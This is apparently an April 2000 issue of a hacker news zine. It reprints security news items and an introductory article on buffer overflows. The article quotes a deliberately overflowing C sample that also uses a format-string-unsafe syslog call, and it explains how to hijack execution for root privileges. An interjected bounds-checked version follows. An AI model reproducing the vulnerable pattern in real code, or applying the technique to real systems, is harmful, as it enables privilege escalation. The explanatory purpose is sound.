To subscribe to this 'zine: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of SUBSCRIBE

To unsubscribe: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of UNSUBSCRIBE

Submissions, questions, comments, and constructive chaos may also be directed to kynik@gh0st.net, napalmzine@hotmail.com or any of the contributors

***********************************************************************

@HWA

193.0 HNS:Apr 8th:NEW KIND OF SECURITY SCANNER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Saturday 8 April 2000 on 3:33 AM

ISS is offering an on-line scanner for Web sites which surveys users' hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge.

Link: The Register
____________________________________________________
http://www.theregister.co.uk/000407-000033.html

----------

Posted 07/04/2000 8:17pm by Thomas C. Greene in Washington

New Web site security scanner will read your HDD

Internet Security Systems (ISS), is offering an on-line scanner for Web sites which surveys users' hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge.
The ISS Online Scanner will automatically test individual computers, identify security weaknesses, and provide users with easy-to-follow instructions for fixing security problems. It looks at the overall configuration of a computer and recommends changes that can help prevent unwanted intruders from reading or changing sensitive personal files or from enabling an attacker to use the computer as a 'zombie' machine to launch more broad-based Internet attacks.

"The importance of offering scalable security management solutions to companies that want best-of-breed technology is critical to the success of protecting the Internet economy," ISS Vice President of Enterprise Software Keith Cooley said. "It is imperative that organizations can easily implement the processes and technologies needed to automatically monitor and respond to security risks. As the industry's leading trusted security provider, ISS is strengthening our unique security software platform to ensure safe and uninterrupted e-business for our customers worldwide," he crooned.

The ISS application will use Active-X technology to scan a visitor's machine and wipe out any undesirable code. The company acknowledges that use of scanning applications by Web sites could be controversial. But we don't see much of a problem with it. Sites that offer it as a free, voluntary service will do themselves and their customers a favour. Sites foolish enough to require it as a condition of visiting or doing business will find themselves paying a heavy price in gross revenues, as the vast majority of Web surfers are sure to be repelled by it. 'Market forces' should be adequate to keep this a relatively harmless little gimmick.
@HWA

194.0 HNS:Apr 8th:WAYS TO ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Saturday 8 April 2000 on 3:32 AM

Following recent high-profile Web security breaches, Enstar, an e-security firm, hosted a live demonstration in San Antonio Friday to show the many ways hackers break into systems.

Link: CRN
____________________________________________________
http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID

----------

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.
/templates/sql_createarticle.asp, line 24

Cool. thanks.

@HWA

195.0 HNS:Apr 7th:STOLEN ACCOUNTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 6:50 PM

"Malicious hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out.

Link: The Straits Times
____________________________________________________
http://www.straitstimes.asia1.com/singapore/sin20_0407.html

----------

APR 8, 2000

Overseas hackers using SingNet accounts to surf

They are racking up bills for customers by using the global-roaming facility. SingNet devises a counter-strategy

By STEVE DAWSON

"MALICIOUS hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out.

The hackers, many of whom have been traced to Thailand, take advantage of a facility called global roaming, provided by SingNet. The facility allows users who travel overseas to call up a service provider there to connect to SingNet, so they save on IDD charges.

The number of complaints from customers who said their accounts have been used by other people peaked at around 50 a month in November and December, said SingNet's product development manager, Mr Lee Wan Fei.
SingNet, which has a 260,000 customer-base, sees the cases as fraud and has referred them to the police.

Most cases seem to involve students, who use chatrooms or instant-messaging services regularly. Here, passwords can either be detected through Trojan-horse viruses installed on the hard drive through files sent via e-mail or lapses in personal security, like giving your password to other people.

Overseas surfers who obtain passwords fraudulently are then able to log on to the Net using an account belonging to a SingNet customer. This unauthorised use raises the customer's bill. SingNet declined to say how much money was involved.

Contractually, SingNet's customers are responsible for all usage on their accounts. But Mr Lee said: "On a case-by-case basis, with adequate proof provided by the user, we may consider offsetting part of the bill for them."

SingNet has launched a two-pronged counterattack. It will, from Tuesday, allow users to disable the global-roaming service, which, at present, cannot be disabled. Secondly, when SingNet detects use of the global-roaming service on an account, the account-holder will be automatically notified.

Mr David Berryman, SingNet's "abuse-master", is working closely with the Criminal Investigation Department on the cases. He said surfers can also play their part by keeping their passwords secure and downloading the free security software available to SingNet subscribers at www.singnet.com.sg/customer/abusetools/

@HWA

196.0 HNS:Apr 7th:JAILED FOR SIX MONTHS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 6:48 PM

Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, was jailed for six months yesterday.
Link: SCMP
____________________________________________________
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp

----------

Thursday, April 6, 2000

Computer hacker jailed for six months

ELAINE PAK LI
--------------------------------------------------------------------------

A shy teenager who became a computer hacker to find "satisfaction and achievement" was jailed for six months yesterday.

Clerk Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, turned to crime because he was a social outcast, a court heard.

Restaurant manager Tam Hei-lun, 19, and student Mak King-ming, 18, were both sentenced to a detention centre for similar offences.

The trio, who had earlier pleaded guilty to a total of 49 computer crime-related charges, appeared before Eastern Court magistrate Ian Candy yesterday.

Po's lawyer, Wong Man-kit, said the clerk suffered asthma and a skin disease, which had isolated him from classmates. Gradually he became an introvert with low self-esteem.

"He then became interested in computers and was obsessed . . . He got a sense of achievement and satisfaction from such offences," Mr Wong said.

Barrister Thomas Chan, for Tam, suggested a community service order so the restaurant manager could be punished and rehabilitated at the same time.

Tse Hon-yuen for Mak, said the student, who was sitting his A-levels, was now "aware of the responsibility of his foolish act".

But Mr Candy, who described the three first offenders as "talented and highly intelligent in computer skills", said they had caused "great damage and loss to society and the economy".

"Each of you are well aware that the things you do are dishonest and wrong. Your offences have even alarmed legitimate Internet users.

"The court must give a clear message that these offences must be given a deterrent sentence.
"Even though each of you have clear criminal records, come from good families and are in every other way talented, the only sentence to impose is an immediate custodial term," Mr Candy said. The court has heard Po had illegally obtained 127 login names and passwords, given to Internet users when they subscribe to a service provider for a monthly fee and an hourly rate. The trio got know each other through the Internet and exchanged the login names and passwords and hacked into a number of user accounts. Mak had also downloaded songs from the Internet and sold them on discs without the publishers' authorisation, the court had heard. Tam wept as he was sentenced while the other two remained expressionless. The trio applied for bail pending appeal and were released on $10,000 bail. Detective Senior Inspector Fung Wai-keung of the Computer Crime Bureau, who was in charge of the case, described the sentences as "appropriate." "Illegally obtaining login names and passwords and selling them for profit is just one of many computer related crimes," he said. "The precedent set today is a good example to show to the international community that Hong Kong will never allow such crimes in the information technology field. "We are not going to let such crimes affect the local electronic trade and its reputation," Inspector Fung added. @HWA 197.0 HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 4:27 PM PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. 
Link: Bugware
____________________________________________________
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,

----------

PcAnywhere weak password encryption

Posted to BugTraq on 7.4.2000

PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and passwords are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their passwords are sent with weak encryption.

A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, the user is prompted for an NT username and password. They are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller. Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT account. All that without even having to go through the L0phtCrack process.

Version 7.0 is not at risk since no encryption is used at all. Username and password are sent in clear. I haven't tested version 8 yet.

--- Solution ---

Symantec says that this was not intended to be real encryption and suggest the use of the Public or Symmetric key option instead.

More info can be found at :
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w

@HWA

198.0 HNS:Apr 7th:NET PRIVACY TOOLS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 3:46 PM

Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal.

Link: CNET
____________________________________________________
http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head

----------

Microsoft plans free Net privacy tools

By The Associated Press
Special to CNET News.com
April 7, 2000, 4:50 a.m. PT

TORONTO--Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal.

Coming from the world's largest software company, the tools could give impetus for Web sites and other companies to embrace the Platform for Privacy Practices, or P3P. The World Wide Web Consortium, an Internet standards group, may finalize P3P this summer.

Richard Purcell, Microsoft's chief privacy officer, said the tools will help consumers better understand how sites track visits and pass along information to other parties. A formal announcement is expected in a few weeks.

Purcell disclosed the company's intent during an interview yesterday at the Computers, Freedom and Privacy conference here, meeting through today.

People using the Internet are increasingly concerned about Web sites that create profiles of email addresses, favorite books and clothing sizes for marketing purposes. Sites often disclose their intent in privacy statements that are difficult to find and understand.

The Microsoft tools, to be released this fall, will translate such statements into machine-readable form and let Internet surfers block access to sites that collect too much.

With the software, people using the Web can state what types of information they are willing to give, as well as whether they mind sharing that information with outside parties. Internet surfers will receive a warning before visiting sites that go beyond that level.

Microsoft plans to make the tools for its browser, Internet Explorer, and for the competing Netscape browsers.

Lorrie Cranor, who heads a P3P working group, considered Microsoft's decision important, saying, "In order for P3P to be widely used, there has to be good user software available.

"The question I always get is, 'Is Microsoft going to implement it?'" she said.
Still, critics believe Web sites won't have incentives to join, rendering such tools and standards meaningless. Jason Catlett, president of Junkbusters and a critic of P3P, said wide adoption remains years away.

@HWA

199.0 HNS:Apr 7th:SECURITY ADDITIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 3:45 PM

Cisco Systems next week plans to ramp up its VPN security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users.

Link: InfoWorld
____________________________________________________
http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml

----------

Cisco plans firewall addition for small businesses

By Cathleen Moore

Cisco Systems next week plans to ramp up its VPN (virtual private network) security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users.

The Cisco PIX Firewall 506 will bring a low-end offering aimed at small businesses and branch offices to the company's existing firewall set. Other products in the family include the PIX 515, targeted at small and midsize enterprises, and the Secure PIX 520, which is designed for large enterprise installations.

With its newest firewall member, Cisco is attempting to tap into small business environments, which -- with increasing reliance on the Internet -- are seeking more powerful security solutions for remote access technologies and VPN.

About the size of a hardback, the PIX 506 can handle throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB of RAM, and two integrated Fast Ethernet ports.

Version 2.0 of Cisco Secure Policy Manager adds improved scalability and additional support for IPsec VPN configurations in Cisco's routers and firewalls.
The Policy Manager lets IT managers define and audit network security policies from a central location, according to the company. The product also can simplify deployment of security services supported by Cisco's firewalls and IOS-based VPN routers, Cisco said.

The Cisco Secure PIX Firewall 506 will be available in May, priced starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this month, priced at $7,500.

Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com.

Cathleen Moore is an InfoWorld reporter.

@HWA

200.0 HNS:Apr 7th:COOKIES
~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 3:43 PM

You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Wired has an article about it and we had a discussion on them on our forum.

Link: Wired on cookies
Link: HNS forum
____________________________________________________

http://www.wired.com/news/politics/0,1283,35498,00.html
http://default.net-security.org/phorum/read.php3?num

----------

Getting Snooped On? Too Bad
by Declan McCullagh

3:00 a.m. Apr. 7, 2000 PDT

TORONTO -- You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should?

Well, here's something to make you really nervous: In the United States, it may be illegal to disable software that snoops on you.

The folks who came up with this idea turn out to be the large corporations that helped to draft the Digital Millennium Copyright Act (DMCA), which restricts some forms of tampering with copyright protection devices. In some cases, that means you won't be able to turn off any surveillance features it might include, according to participants in a Thursday afternoon panel at the Computers, Freedom and Privacy conference.

"Privacy circumvention is possible only under a limited circumstance," said Paul Schwartz of the Brooklyn Law School.
As more and more copyrighted material makes its way online, content owners are turning to encryption to protect their works from widespread illicit redistribution. Stephen King distributed his recent novel online in encrypted form, and music companies are backing Secure Digital Memory Card for audio players.

Privacy advocates fret that if future works are secure and thus protected under the DMCA, they could reveal consumers' private behavior -- RealNetworks' RealJukebox player secretly did just that -- and tinkering with the program to turn off the reporting mechanism would be illegal.

"The practical impact is it's another area we're going to be fighting about," Schwartz said.

The DMCA, which became law in October 1998, does allow some very limited forms of privacy circumvention. You're allowed to do it if the software leaks "personally identifying information" about you without giving you the ability to say no, and if you're not "in violation of any other law."

But here's the rub: Many, if not most, programs include shrink-wrap licenses that prohibit reverse-engineering or altering the program. Some courts have said that shrink-wrap licenses -- software license agreements that don't require a signature -- are binding. If you violate them, would you be able to take advantage of the DMCA's privacy-circumvention loophole?

The answer may well be yes. "The statute is basically totally incoherent," says Pam Samuelson, a professor at the University of California at Berkeley and an influential copyright scholar.

"We're getting tortured by laws that are inherently incoherent," complained Barry Steinhardt, associate director of the ACLU.

Violating the DMCA is a civil offense, and "willfully" violating it for private financial gain is a criminal offense punishable by five years in jail and a $500,000 fine.
(Cookies are a dead non-issue, get over it - Ed)

@HWA

201.0 HNS:Apr 7th:SECURE E-MAIL SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 3:39 PM

The Royal Mail has launched a secure e-mail service through its secure technology service, ViaCode.

Link: Silicon.com
____________________________________________________

http://www.silicon.com/public/door?REQUNIQ

----------

@HWA

202.0 HNS:Apr 7th:ONLINE MUGGERS
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 7 April 2000 on 3:38 PM

"You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do?" Read Winn Schwartau's article.

Link: IDG.net
____________________________________________________

http://www.idg.net/servlet/ContentServlet?global_doc_id

----------

We're sorry but we are currently unable to process your request. Please try again later. If you continue to get this message, please go to Feedback and let us know. We apologize for the inconvenience.

(Guess they were mugged ... -Ed)

@HWA

203.0 HNS:Apr 6th:SURVEY BY DTI
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 6 April 2000 on 3:00 PM

British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers. That is one of the conclusions published by Department of Trade and Industry.

Contributed by Lady Sharrow.
Link: The Register
____________________________________________________

http://www.theregister.co.uk/000406-000023.html

----------

Printed elsewhere

@HWA

204.0 HNS:Apr 6th:COMPUTER CODES PROTECTED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 6 April 2000 on 1:58 PM

Computer programs used to scramble electronic messages are protected by the First Amendment because those codes are a means of communication among programmers, a federal appeals court ruled Tuesday.

Link: Associated Press
____________________________________________________

http://www.worldnews.com/?action

----------

bad url

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, will@sowerbutts.com and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.

(sourbutts? LOL - Ed)

@HWA

205.0 HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 6 April 2000 on 1:57 PM

A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine.

Link: BBC
____________________________________________________

http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm

----------

Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK

Man released after code machine theft

(Photo caption: Bletchley Park: Centre for wartime code-breaking effort)

A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine.

The man, from Bedfordshire, was arrested on Tuesday and released after questioning at Milton Keynes police station.
Police have mounted a massive search for the historic machine, which cracked the Nazi Enigma code during the Second World War.

It was stolen in broad daylight from a glass cabinet at the Bletchley Park museum on Saturday, where it was on display.

Police officers were preparing to trawl a lake on the estate and search the mansion.

Thames Valley Police spokesman John Brett said: "A search of the mansion and the grounds of Bletchley Park will start under the supervision of a police search adviser and a team of 10 police officers.

(Photo caption: The missing Enigma machine)

"There is a possibility that a Thames Valley Police underwater search unit may be used to search the lake in Bletchley Park.

"It could be hidden under the stairs in the mansion, there are lots of places it could be."

Detectives think the thief could have abandoned the Enigma machine within the 50-acre grounds of the estate, or in one of the 70 rooms in the mansion.

The museum in Milton Keynes, Buckinghamshire, was raided in full view of visitors during an open day on Saturday.

The Enigma - one of only three in the world - is worth up to £100,000 and was used by the Germans to encrypt messages sent during the Second World War.

Bletchley Park is believed to have shortened the war by cracking the code.

Detectives were appealing for any visitors on Saturday who took pictures or video footage to contact police in the hope they might identify the thief.

Reward offered

Mr Brett urged whoever stole the machine not to be tempted to destroy the evidence in the light of massive publicity.

He added: "If it's a prank that's gone wrong, don't destroy it because our main priority is getting it back."

A £5,000 reward is being offered by BT, owners of part of the site in Milton Keynes since World War II.

"It is a tragedy that the machine has been stolen," Alan White, director of BT's property division, said.
@HWA

206.0 HNS:Apr 6th:CYBERPATROL BLOCK LIST
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 6 April 2000 on 1:36 PM

Our affiliates at Security Watch wrote that a list of thousands of hosts, websites and Usenet groups blocked by Microsystems Software Inc.'s CyberPatrol software has been published on the web.

Link: Security Watch
____________________________________________________

http://www.securitywatch.com/scripts/news/list.asp?AID

----------

@HWA

207.0 HNS:Apr 5th:CRYPTO REGULATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 5 April 2000 on 12:27 PM

Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software.

Link: Wired
____________________________________________________

http://www.wired.com/news/politics/0,1283,35425,00.html

----------

Crypto Regs Challenged Again
by Declan McCullagh

4:00 p.m. Apr. 4, 2000 PDT

Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software.

The Sixth Circuit Court of Appeals suggested Monday that President Clinton's restrictions on distributing encryption products might be unconstitutional.

"Because computer source code is an expressive means for the exchange of information and ideas about computer programming, we hold that it is protected by the First Amendment," a three-judge panel said in a unanimous 17KB decision.

That decision reversed a July 1998 ruling by a federal district court. And while the panel did not strike down the Clinton administration's regulations, it did refer the matter back to U.S. District Judge James Gwin for another hearing. Earlier Gwin had ruled the First Amendment did not apply.
The Justice Department says source code is akin to instructions for a machine, and rules governing its distribution are necessary for national security reasons.

Now that the appeals court has ruled source code is protected by the First Amendment, the government will have a much tougher time arguing it should have the power to imprison a law professor for posting a book on his website.

Peter Junger, a professor at Case Western University School of Law, sued the federal government after it told him he needed a license to post a chapter of his Computers and the Law textbook online.

The American Civil Liberties Union, which represents Junger, applauded the ruling. "This is a great day for programmers, computer scientists and all Americans who believe that privacy and intellectual freedom should be free from government control," said ACLU Legal Director Raymond Vasvari.

In a separate case that also challenges the criminal penalties the U.S. government imposes for unauthorized encryption distribution, the 9th U.S. Circuit Court of Appeals in May 1999 ruled that encryption source code was speech protected by the First Amendment.

"We conclude that the challenged regulations allow the government to restrain speech indefinitely with no clear criteria for review," the 9th Circuit panel said in its decision in a case brought by math professor Daniel Bernstein.

But it's not clear what happens next in either the Junger or Bernstein cases. The Clinton administration relaxed the regulations in January, and the move is likely to delay both lawsuits for some time.

In fact, the Commerce Department, which administers the regulations, says that Bernstein no longer has anything to worry about.

"You ask for an advisory opinion in light of your concern that the new regulations 'continue to interfere with Professor Bernstein's planned scientific activities.'
Your concerns are unfounded," a Commerce Department Bureau of Export Administration official wrote to Bernstein's lawyers in February.

Bernstein asked in March for a rehearing by the district court to take into account the regulation changes.

@HWA

208.0 HNS:Apr 5th:GFI AND NORMAN TEAM UP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 5 April 2000 on 12:24 PM

GFI and Norman have teamed up to integrate the Norman Virus Engine with GFI's e-mail security gateway, Mail essentials.

Link: ESJ
____________________________________________________

http://www.esj.com/breaknewsdisp.asp?ID

----------

@HWA

209.0 HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 5 April 2000 on 12:23 PM

MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package.

Link: Computer Currents
____________________________________________________

http://www.currents.net/newstoday/00/04/05/news5.html

----------

Daily News

MasterCard Offers Virus Repair Service
By Steve Gold, Newsbytes
April 05, 2000

MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package.

The card issuer has tapped Vipro Corp. for the service, which is available to all MasterCard Executive BusinessCard holders. For those cardholders that require the service, MasterCard is offering Vipro's Virus Service Plan (VSP), a normally paid-for facility, free of charge to BusinessCard holders.

Vipro's Virus Service Plan is billed as providing computer users "coverage" from destructive viruses. If a virus damages a plan holder's computer, Vipro will repair it at no charge to the member.

The service, which is designed for consumers and small business owners, includes a copy of Norton AntiVirus as standard, as well as online and telephone technical support.
In the event that Norton AntiVirus and/or support from a telephone tech support person cannot assist the user in getting his/her PC back up and running, Vipro says it has a network of more than 7,000 local repair centers available across the US.

Bernie Brenner, Vipro's president, said that small businesses are extremely vulnerable to computer virus attacks. "As more businesses plug into the Internet and conduct more of their day-to-day business transactions online, the chance of a virus attack increases," he said.

Newsbytes notes that the MasterCard Virus Service Plan is included free as a MasterCard Executive BusinessCard benefit and includes free virus repair reimbursement, Web technical support, a three-month trial of Norton Antivirus, telephone technical support, and access to the online virus resource center.

MasterCard's Web site is at http://www.mastercard.com .

Vipro's Web site is at http://www.vipro.com .

Reported by Newsbytes.com

@HWA

210.0 HNS:Apr 5th:BUFFER OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 5 April 2000 on 3:12 AM

In a survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago, approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem. Read the new Default article which deals with buffer overflows.

Link: Default
____________________________________________________

http://net-security.org/default/articles/09/02.shtml

----------

DEFAULT ARTICLES

Smashing the what??
An introduction to memory buffers and an explanation of their possible uses as weaknesses -- by Thejian

Introduction

In a survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago, approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem.
(http://immunix.org/SlackGuard/discex00.pdf)

When you troll through the messages and advisories on this same list, you indeed get the impression this might not be too far from the truth, since the lil' boogers are mentioned everywhere.

In the following article I'll try to explain a bit more about the way memory is handled on a system and how these buffer problems can be used to exploit it. Most of the various files floating around out there, however, require quite a background in programming etc. to understand; I'll try to make this understandable even for those of you who do not exactly meet that requirement (maybe particularly those of you). I hope to "simplify", not "dumbify", but still this is just a basic approach, useful as an introduction to the more technical texts by individuals such as Dr. Mudge, Elias Levy (Aleph One) and many others (see bibliography). So if you were born with pure ASM running through your veins you might want to look elsewhere; if however you're just the average enthusiast wanting to know what all those "elite" people are talking about, do read on :)

What are these "buffers" you keep talking about?

A computer program basically is a set of instructions and requests. This can most easily be illustrated in the form of the famous "if-then-else" loop. An instruction is run, resulting in variables which decide the course of the program while the follow-up instructions are run.

A buffer (in programming) is an area in memory shared by different processes on the system. Basically a buffer makes it possible for different processes to run simultaneously without holding each other up, or to hold data in a place where it can be manipulated before it's moved to a file.

The program also needs a way to "remember" how to follow up when the current instruction is done, what to do next. This is where the "Stack" comes in.

The what??
The Stack (or "push-down list") is a (dynamically) growable area of memory where, when a program is executed, it dumps its data (variables, memory addresses etc), which gets manipulated by whatever rules and algorithms are present/applicable, and then continues. Then the "next to-do" instruction is taken from the top of the Stack and executed. "From the top" might give you the impression this process is defined by means of a predestined orderly list of some kind. The way this actually works, however, is that the last instruction passed on to the system to be executed ends up on top of the stack, so you could say it works in a "last in - first out" manner.

The top and bottom of the stack are defined by the Stack pointer (which holds the memory address where the top of the Stack can be found) and the Base pointer (which obviously is the other one, pointing at the bottom or base of the Stack). Contrary to what might seem logical, the numbers associated with the memory addresses start at the bottom of the stack (hence the "base") and count up. Because of this, programs generally refer to the BP for the location of their data. This means the start of a 10 character instruction is not called as SP + 1 but as BP -11 (or actually BP +11 because of the numbers counting up "backwards").

The Buffer Overflow

As said before, a buffer is an area shared by different processes. Obviously there is a need for a certain flexibility here, to allow this changing of different processes to actually happen and to allow it to be called from different positions in the program. These buffers are subject to certain rules though, and overflowing them is nothing more than the word says: breaking those rules by filling up a buffer by putting more in it than fits. (think of trying to hammer the triangle into the mold of a circle :)

An example (part of the doc on the writing of Buffer Overflows by Dr. Mudge of L0pht Heavy Industries, mentioned in the bibliography):

--------syslog_test_1.c------------
#include <syslog.h>

char buffer[4028];   /* global buffer of 4028 bytes, valid indices 0..4027 */

void main() {
  int i;
  /* i runs from 0 to 4028 inclusive: 4029 A's, one written past the
     end of the array, and no terminating NUL is ever stored */
  for (i=0; i<=4028; i++)
    buffer[i]='A';
  syslog(LOG_ERR, buffer);
}
--------end syslog_test_1.c----------

What happens here is that the buffer, which is set to contain 4028 characters, is filled with A's as long as the amount of A's is smaller than or equals 4028. Obviously the set buffer size eventually is exceeded, causing the buffer to "overflow". The system returns:

Program received signal 11, Segmentation fault
0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)

or pops up something like the following (when in Windows):

"The Instruction at '0x1273' referenced memory at '0x41414141'. The memory could not be read."

Here the second line tells us a number of things, such as the location where it crashed. The 41's you see are the hex equivalent of the ASCII character 'A'.

Gee that's nice.. but what can I do with it?

Most network/server systems manage a variety of different accounts to keep track of which user is where doing what, and to make sure no user could have access to things (be it files or processes/services) he or she shouldn't have. Obviously the accounts with the higher privileges are the most interesting ones, because they give access to and allow manipulation/execution of a lot more things. What you'd want to do is to exploit a Buffer Overflow in something (program/service/etc) run by one of these accounts, allowing you to change the position indicating the "next-to-do" instruction and possibly allowing you to execute your own code. By overwriting this pointer with (enough of) the value you use to overflow the buffer, the program is redirected to (when using the A's mentioned in the above example) address 0x41414141 and executes the instructions it finds there. The beauty of this all is that these instructions are run with the privileges of the account whose process you interrupted.
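As an added example (not part of Thejian's article or Mudge's paper), here is the bounds-checked counterpart to syslog_test_1.c: the fill stops while there is still room for a terminating NUL, a sentinel byte placed right after the buffer proves nothing was written past it, and the buffer is logged through a fixed "%s" format instead of being passed as the format string itself. The helper names and the sentinel layout are my own.

```c
#include <stddef.h>
#include <string.h>
#include <syslog.h>

#define BUFSZ 4028          /* same size as the buffer in syslog_test_1.c */
#define SENTINEL 0xA5       /* constructed guard value, any fixed byte works */

/* Store up to `requested` copies of 'A' in dst, never more than cap-1 so
 * a terminating NUL always fits.  Returns how many 'A's were stored.
 * With cap == 0 or a NULL dst nothing is written and 0 is returned. */
size_t fill_with_a(char *dst, size_t cap, size_t requested)
{
    size_t n;
    if (dst == NULL || cap == 0)
        return 0;
    n = requested < cap - 1 ? requested : cap - 1;
    memset(dst, 'A', n);
    dst[n] = '\0';
    return n;
}

/* The buffer is followed by one guard byte.  A routine that steps one
 * past the end, the way the i<=4028 loop does, would change it.
 * (Assumes char members are laid out back to back, which they are:
 * char has no alignment padding.) */
struct guarded_buf {
    char          buf[BUFSZ];
    unsigned char sentinel;
};

/* Run the checked fill against a guarded buffer and report whether the
 * guard survived: 1 when intact, 0 when it was overwritten. */
int checked_fill_keeps_sentinel(struct guarded_buf *g, size_t requested)
{
    g->sentinel = SENTINEL;
    fill_with_a(g->buf, sizeof g->buf, requested);
    return g->sentinel == SENTINEL;
}

/* Log through a constant format.  syslog_test_1.c handed the buffer to
 * syslog() as the format string; "%s" keeps buffer contents from ever
 * being interpreted as format directives. */
void log_buffer(const char *buf)
{
    syslog(LOG_ERR, "%s", buf);
}

int main(void)
{
    struct guarded_buf g;
    size_t written;

    g.sentinel = SENTINEL;
    /* the original loop asks for 4029 A's; the checked fill stores 4027 */
    written = fill_with_a(g.buf, sizeof g.buf, 4029);
    log_buffer(g.buf);      /* goes to the system log, not the terminal */
    return (written == BUFSZ - 1 && g.sentinel == SENTINEL) ? 0 : 1;
}
```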
This way you could pop up a command prompt as root or run code you wrote/uploaded on another account with the privileges of the administrator. Imagine the possibilities :) So as Mudge says, "put on those warp refraction eye-goggles and on we go"!

The more technical side (or: Bibliography)

Now you have a bit of an understanding as to what buffer overflows actually are and how they work, or at least so I hope. If you got the taste for it now, or just want to experiment, you might want to move on to the following files:

